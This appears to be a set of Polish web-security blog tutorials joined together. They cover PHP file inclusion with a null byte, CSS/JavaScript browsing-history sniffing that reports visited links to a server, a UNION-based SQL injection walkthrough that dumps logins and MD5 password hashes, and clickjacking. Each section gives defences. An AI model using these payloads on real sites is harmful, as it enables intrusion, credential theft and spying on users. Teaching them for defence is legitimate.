Na atak są podatne strony wykorzystujące takie funkcje jak np. file(), file_get_contents(), include(), include_once(), require() i inne czytające dane z jakiegoś pliku. Ważne aby w paramtr określający adres czytanych zasobów był zależny od jakiejść zmiennej przesłanej przez użytkownika. Przykładowy(bardzo popularny) kod:

include('strony/'.$_GET['page'].'.html');

Atak działa podobnie jak SQL Injection. Musimy tak spreparować adres aby odnosił się on do innego pliku. Spróbujmy wpisać:

example.com?page=../index

Skrypt powinien wczytać plik strony/../index.html czyli po prostu index.html. Problem stanowi rozszerzenie określone z góry przez programistę. Gdybyśmy się go pozbyli, możliwe byłoby dołączenie dowolnego pliku, do którego posiadamy uprawnienia. Zastanówmy się jednak w jaki sposób działają powyższe funkcje. Wiemy, że PHP jest pisany w C. Jako parametr podajemy ciąg znaków. Każdy programujący w C wie, że stringi w tym języku to po prostu tablice znaków wyglądające następująco:

Jakis ciag znakow\0

Znakiem który określa zakończenie napisu jest znak zero. Jest to spowodowane tym, że tablica może mieć większy rozmiar niż długość napisu. Jezyk C jest tak napisany, że sam nie zeruje wartośći w pamięci na które wskazujemy więc brak znaku zero powodowałoby wyświetlanie „śmieci“ z pamięci. Tak więc dobrym pomysłem byłoby wszczepienie znaku \0 do naszego zapytania. Spróbujmy wpisać w adresie strony coś takiego:

example.com?page=../index.php%00

Jak zinterpretuje to PHP? Do funkcji include() zostanie przekazany ciąg znaków strony/../index.php\0.html. Funkcja include otrzymując w parametrze tablicę znaków wybierze wszystkie aż do znaku \0. W ten sposób końcówka .html zostanie uznana za śmieci z pamięci. Jak się chronić przed tym atakiem? Wystarczy prosty test poprawności przesyłanych danych:

if( preg_match('/^[a-zA-Z0-9]*$/', $_GET['page']) )
  include('strony/'.$_GET['page'].'.html');

Ograniczenia? Niestety możemy uruchomić jedynie pliki znajdujące się na serwerze. Jest jednak kilka sposobów aby sobie z tym problemem poradzić. Następnym razem przedstawię jak uruchomić własny kod PHP w przypadku dziury przedstawionej w tym artykule oraz błędnej konfiguracji serwera.

Sposób działania

Nie da się(a przynajmniej nie w takiej postaci jaką dzisiaj pokażę) przeglądać całej historii. Jest jednak sposób aby wyciągnąć informację o tym czy użytkownik odwiedził konkretny adres www. Wszystko dlatego, że CSS posiada pseudoklasę :visited dzięki której można określij inne ostylowanie dla linków odwiedzonych. Przy użyciu JavaScript w łatwy sposób można sprawdzić, które linki mają inny styl i wysłać o nich informację na serwer.

Implementacja

Są dwie techniki, dzięki którym możemy wysłać informację na serwer. Pierwsza(moim zdaniem gorsza) w dużym skrócie wygląda tak:

<a href="http://google.pl" class="google">Google!</a>

a.google:visited{background:url('http://example.com?sitevisited=google'); }

Jeśli link jest odwiedzony zostanie wysłane zapytanie o tło do serwera example.com. Serwer wcale nie musi zwracać obrazka. Wystarczy, że doda użytkownika do swojej bazy danych.

Druga — znacznie ciekawsza — wykorzystuje JS, również działa w tle i także jest praktycznie nie widoczna dla użytkownika(trzeba zajrzeć do kodu). Co więcej nie musimy określać oddzielnych klas CSS dla każdego adresu. Przejdzmy do kodowania. Przede wszystkim potrzebujemy kontener na linki oraz styl dla odnośników odwiedzonych.

  #tempLinkContainer a:visited{display:none;}

Używam display a nie np. color ponieważ poszczególne przeglądarki różnie interpretują kolory — Opera przechowuje je w postaci heksadecymalnej #RRBBGG, a Firefox w systemie dzisiętnym rgb(R,G,B). Display jest jednolity więc nie będzie z nim problemów. Czas na rdzeń skryptu JavaScript.

function checkLink(url) {
  var myLink = document.createElement('a');
  myLink.href= url;
  var container = document.getElementById('tempLinkContainer');
  container.appendChild(myLink);
  if(myLink.currentStyle)
    var visited = myLink.currentStyle.display=='none';
  else
    var visited = document.defaultView.getComputedStyle(myLink, null).display=='none';
  container.removeChild(myLink);
  return visited;
}

Funkcja jako parametr przyjmuje adres url strony którą chcemy sprawdzić. Najpierw tworzony jest element a i uzupełniany jest jego parametr href. Następnie ten element jest umieszczany w naszym elemencie div. W ten sposób link otrzymuje odpowiednie ostylowanie jeśli jest odwiedzony. Jedyne co nam pozostaje to sprawdzenie parametru display. W tym celu należy pobrać styl obliczany naszego linku. Niestety IE(wraz z Operą) obsługują to troszke inaczej niż Firefox, Safari i inne przeglądarki — stąd ta instrukcja warunkowa. Wynik jest zapisywany do zmiennej visited, link niszczony i wartość na końcu zwracana. Efekt można zobaczyć tutaj. Zauważ, że linki odwiedzone otrzymują klasę visited(ustawienie koloru na zielony). Żadna pseudoklasa :visited, nie definiuje zielonego koloru — jest to zasługa JavaScript.

Oczywiście ta technika nie jest idealna — rozróżnia np. linki typu:

• http://httpd.apache.org/docs/2.0/mod/core.html#errorlog
• http://httpd.apache.org/docs/2.0/mod/core.html
• http://httpd.apache.org

Jednak łatwo domyśleć się, że większość użytkowników odwiedzających np. Facebook.com najpierw uruchamia jego stronę główną. Technikę tą można użyć nie tylko do szpiegowania użytkowników. Można dzięki niej uatrakcyjnić stronę internetową serwując różne rzeczy w zależności od historii np. można umieścić informację na temat profilu na Facebook.com zamiast na nasza-klasa.pl jeśli użytkownik nie odwiedza naszej-klasy a odzwiedza facebooka.

W weekend planuję przysiąść do poprawek mojego blogu więc prawdopodobnie spróbuję dodać kilka ciekawych opcji.

Stwórzmy przykładową bazę danych „hack“ aby pokazać jak to wygląda od drugiej strony.

CREATE TABLE articles(
id int(10) AUTO_INCREMENT,
title varchar(80) NOT NULL,
content text NOT NULL,
author int(10),
category int(10),
PRIMARY KEY(id)
);
 
CREATE TABLE users(
id int(10) AUTO_INCREMENT,
login varchar(40) NOT NULL,
email varchar(60) NOT NULL,
password varchar(32) NOT NULL,
PRIMARY KEY(id)
);

Wypełnijmy je danymi:

mysql> select * from articles;
+----+--------------+----------+--------+----------+
| id | title        | content  | author | category |
+----+--------------+----------+--------+----------+
|  1 | Artykul nr 1 | tresc... |      1 |        2 |
|  2 | Artykul nr 2 | tresc... |      3 |        1 |
|  3 | Artykul nr 3 | tresc... |      2 |        1 |
|  4 | Artykul nr 4 | tresc... |      3 |        2 |
+----+--------------+----------+--------+----------+
mysql> select * from users;
+----+--------+--------------------+----------------------------------+
| id | login  | email              | password                         |
+----+--------+--------------------+----------------------------------+
|  1 | Michal | michal@example.com | 1660fe5c81c4ce64a2611494c439e1ba |
|  2 | Magda  | romek@example.com  | 9d0250b24620c2056516e5d2d79eed4a |
|  3 | Romek  | romek@example.com  | 944278ab01f435bfc369fa038130f25b |
+----+--------+--------------------+----------------------------------+

Czas na kod PHP odpowiedzialny za pobieranie artykułów. Pomijam filtrowanie zmiennych przychodzących. Wygląda to mniej więcej tak:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

<?php
$mysqli = new mysqli('localhost', 'root', '', 'hack');
 
if(isset($_GET['id']))
  $result = $mysqli->query('SELECT a.*, u.login FROM articles a, users u WHERE a.author=u.id AND a.id='.$_GET['id']);
else
  $result = $mysqli->query('SELECT a.*, u.login FROM articles a, users u WHERE a.author=u.id');
 
while($row = $result->fetch_array())
{
  echo '<h2>'.$row['title'].'</h2>';
  echo '<strong>Author: '.$row['author'].'</strong>';
  echo '<p>'.$row['content'].'</p>';
}
?>

Wystarczy mała nieuwaga aby skrypt był dziurawy jak ser szwajcarski. Co więcej, dziurę taką da się bardzo łatwo wykryć — wystarczy apostrof lub cudzysłów.

http://localhost/hack/sql/?id=1'

Naszym oczom ukaże się błąd:

Fatal error: Call to a member function fetch_array() on a non-object in /home/hellson/public_html/hack/sql/index.php on line 27 

Jest to informacja, że użytkownik może wpływać na treść zapytania SQL. Dlaczego tak się dzieje? PHP bezmyslnie umieszcza zmienną $_GET[’id’] do zapytania SQL które teraz wygląda tak:

SELECT a.*, u.login FROM articles a, users u WHERE a.author=u.id AND a.id=1'

Jest to niepoprawne zapytanie więc php zwraca błąd metody fetch_array(). Tym samym jest to informacja, że haker może spreparować własne zapytania, które zwrócą mu loginy i hasła. Oczywiście w sytuacji gdy nie zna on struktury bazy danych jest to troszkę utrudnione lecz wciąż możliwe. Aby uświadomić o jakie aspekty należy zadbać warto dowiedzieć się jak to robi przeciętny włamywacz.

Od strony hakera

Pierwszym krokiem jest sprawdzenie czy rzeczywiście możemy wpływać na zapytanie. Najlepiej jest dopisać nic nie znaczące „OR 1=1″

http://localhost/hack/sql/?id=1 OR 1=1

SELECT a.*, u.login FROM articles a, users u WHERE a.author=u.id AND a.id=1 OR 1=1

Naszym oczom powinna ukazać się pełna lista artykułów zamiast tylko jednego lub jeśli na stronie moduł pobiera tylko pierwszy rekord otrzymamy inny niż jest sprecyzowany w zmiennej id(oczywiście należy wziąć pod uwagę sortowanie). Kolejnym krokiem jest wprowadzenie własnego zapytania. Najczęściej używa się UNION ponieważ jest to najprostsza technika. UNION połączy 2 zapytania tylko wtedy gdy będą one posiadać taką samą ilość kolumn. Warto więc najpierw to sprawdzić metodą prób i błędów pobierając kolejno 2 NULL-e, 3 NULL-e itd. W naszym przykładzie wystarczy sześć.

http://localhost/hack/sql/?id=1 UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL

SELECT a.*, u.login FROM articles a, users u WHERE a.author=u.id AND a.id=1 UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL

Sprawdzmy, które pola odpowiadają poszczególnym rzeczom wyświetlanym na stronie.

http://localhost/hack/sql/?id=1 UNION SELECT NULL,'Tytuł','Tresc','Autor',NULL,NULL

SELECT a.*, u.login FROM articles a, users u WHERE a.author=u.id AND a.id=1 UNION SELECT NULL,'Tytuł','Tresc','Autor',NULL,NULL

Zauważ, że nie podaję jeszcze nazwy tabeli aby nie komplikować sobie całej operacji. W przypadku otwartych rozwiązań sprawa jest prosta ponieważ wystarczy zajrzeć w kod i odczytać nazwy tabel. Czasami skrypty wyświetlają komunikat o błędzie SQL, który zawiera zapytanie(sic!). Ewentualnym problemem mogą być prefiksy w nazwach. Metodą prób i błędów można jednak odkryć, że tabele z naszego przykładu to „articles“ oraz „users“

http://localhost/hack/sql/?id=1 UNION SELECT NULL,'Tytuł','Tresc','Autor',NULL,NULL FROM users

SELECT a.*, u.login FROM articles a, users u WHERE a.author=u.id AND a.id=1 UNION SELECT NULL,'Tytuł','Tresc','Autor',NULL,NULL FROM users

Pozostała część to już jedynie formalność. Należy pobrać odpowiednią ilość elementów z tabeli users.

http://localhost/hack/sql/?id=1 UNION SELECT users.*,NULL,NULL FROM users

SELECT a.*, u.login FROM articles a, users u WHERE a.author=u.id AND a.id=1 UNION SELECT users.*,NULL,NULL FROM users

Gotowe! Zamiast artykułów mamy loginy i hasła. Jeśli programista jest początkujący prawdopodobnie nie dodaje soli do haseł a te są kodowane za pomocą MD5. Wystarczy w google pisać „md5 database“ aby szybko znaleźć stronę, która dopasuje odpowiedni ciąg znaków do podanego hasha. Można w ten sposób spokojnie odkodować hasła przynajmniej połowy użytkowników przeciętnego portalu internetowego. Sprawa jest utrudniona, gdy tabela users zawiera np. 15 kolumn. Wtedy odgadnąć trzeba również nazwy pól.

http://localhost/hack/sql/?id=1 UNION SELECT NULL, users.email, users.password, users.login, NULL,NULL FROM users

SELECT a.*, u.login FROM articles a, users u WHERE a.author=u.id AND a.id=1 UNION SELECT NULL, users.email, users.password, users.login, NULL,NULL FROM users

Jeśli strona jest słabo zabezpieczona to prawdobodobnie również nazwy tabel i pól są proste to odgadnięcia. Dla dobrego hakera wszystko jest kwestią czasu. Oczywiście twórca strony może troszkę udziwniać np. umieścić wartość w cudzysłowiach jednak to też mu niewiele da ponieważ wystarczy wpisać:

http://localhost/hack/sql/?id=1" UNION SELECT users.*,NULL,NULL FROM users WHERE 1="1

SELECT a.*, u.login FROM articles a, users u WHERE a.author=u.id AND a.id="1" UNION SELECT users.*,NULL,NULL FROM users WHERE 1="1"

Oczywiście to nie wyczerpuje tematu i być może kiedyś rozwinę jeszcze temat dziurawych zapytań SQL.

Jak się zabezpieczyć?

Najprostszym ze sposobów zabezpieczania się jest użycie mysqli::real_escape_string(). Aby uniemożliwić atak wystarczy aby nasz kod wyglądał tak:

5

$result = $mysqli->query('SELECT a.*, u.login FROM articles a, users u WHERE a.author=u.id AND a.id="'.$mysqli->real_escape_string($_GET['id']).'"');

Osobiście jednak preferuję filtrowanie wszystkich danych przychodzących wedle własnych wzorców tak aby wykluczyć np. uruchomienie zapytania z ciągiem znaków zamiast cyfr, filtracje kodu html, znaków specjalnych itp. Świetnym rozwiązaniem wprowadzonym w php5 wraz z mysqli jest bindowanie parametrów(podobnie jak to ma miejsce w QT) ale o tym napiszę innym razem.

Rozpocznijmy od małej gry, którą napisałem przy użyciu jQuery na potrzeby tego artykułu. Polega ona na bardzo szybkim klikaniu w pojawiający się czerwony prostokąt. Dasz radę? Zagraj!

ClickJacking polega na — tłumacząc dosłownie — „porywaniu kliknięć“. Zasada jest prosta. Niewidzialna ramka jest ukrywana pod stroną za pomocą css(a dokładniej z-index). Czeka ona w tle, aż potencjalna ofiara zechce kliknąć w pewne pole na ekranie. Wtedy warstwa ramki przechodzi nad warstwę gry. Użytkownik myśląc, że klika w prawdziwy element w rzeczywistości uruchamia mechanizm z ramki. Brzmi niepozornie? Atak taki wykorzystywany jest na wiele sposobów. Można np. umieścić w ramcę stronę facebook.com oraz odpowiednio sprecyzować pola w które należy kliknąć. Dzięki temu użytkownik zmieni swoje ustawienia dotyczące prywatności umożliwiając kradzież swoich danych osobowych i możliwość przeglądania zdjęć. Wbrew pozorom są setki niezabezpieczonych stron internetowych. Jedną z nich była kiedyś witryna konfiguracyjna wtyczki flash. Odpowiednio sprecyzowana strona pozwalała na zmianę ustawieć wtyczki tak aby możliwy był dostęp do kamery internetowej(sic!). Dzięki temu hakerzy mogli nawet podglądać swoje ofiary. Na szczęście Adobe wprowadziło zabezpieczenia, które uniemożliwiają przeprowadzenie takiego ataku.

Jak się chronić?

Zwykli użytkownicy mogą zainstalować wtyczkę NoScript, która chroni przed tym atakiem. W przypadku twórców stron internetowych sprawa jest prosta. Nie wolno pozwalać uruchamiać naszej strony w ramce(tym bardziej, że ramki to już przestarzała technologia). Robi tak GMail, nasza-klasa, o2 i inni.
Kod(tzw. Framekiller) jest bardzo prosty:

<script type="text/javascript">
    if (top!=self){
        top.location.href=self.location.href;
    }
</script>

W przypadku uruchomienia strony w ramce strona nadrzędna zostanie przekierowana na stronę w ramce.